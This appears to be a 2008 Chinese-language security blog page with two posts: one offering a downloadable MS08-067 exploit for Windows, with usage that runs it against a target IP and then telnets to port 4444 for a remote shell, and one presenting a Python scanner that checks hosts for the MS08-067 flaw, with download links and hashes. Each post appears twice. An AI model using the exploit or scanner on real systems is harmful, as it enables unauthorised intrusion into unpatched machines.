Windows下MS08-067.exe
[ 2008/11/03 18:30 | by selboo ]
使用方法:
C:\>MS08-067.exe 192.0.0.150
MS08-067 Exploit for CN by EMM@ph4nt0m.org
SMB Connect OK!
Send Payload Over!
C:\>telnet 192.0.0.150 4444
下载地址:
Microsoft 安全公告 MS08-067 - 严重
C:\>MS08-067.exe 192.0.0.150
MS08-067 Exploit for CN by EMM@ph4nt0m.org
SMB Connect OK!
Send Payload Over!
C:\>telnet 192.0.0.150 4444
下载地址:
下载文件 (已下载 515 次)
Microsoft 安全公告 MS08-067 - 严重
python版MS08-067漏洞检测工具
[ 2008/11/03 18:26 | by selboo ]
This tool can be used to anonymously check if a target machine or a list of target machines are affected by MS08-067 (Vulnerability in Server Service Could Allow Remote Code Execution)
Usage
$ python ms08-067_check.py -h
Usage: ms08-067_check.py [-d] {-t |-l }
Options:
--version show program's version number and exit
-h, --help show this help message and exit
-d show description and exit
-t TARGET target IP or hostname
-l LIST text file with list of targets
-s be silent
Example
$ python ms08-067_check.py -t 192.168.123.30
192.168.123.30: VULNERABLE
下载地址:ms08-067_check.py
MD5: 67E72C148E5B3E606E4FEAAEF9436563
SHA1:5F0EF8BDBA8B58F2E2FF9F0C1B2176823A2FB92B
Usage
$ python ms08-067_check.py -h
Usage: ms08-067_check.py [-d] {-t |-l }
Options:
--version show program's version number and exit
-h, --help show this help message and exit
-d show description and exit
-t TARGET target IP or hostname
-l LIST text file with list of targets
-s be silent
Example
$ python ms08-067_check.py -t 192.168.123.30
192.168.123.30: VULNERABLE
下载地址:ms08-067_check.py
MD5: 67E72C148E5B3E606E4FEAAEF9436563
SHA1:5F0EF8BDBA8B58F2E2FF9F0C1B2176823A2FB92B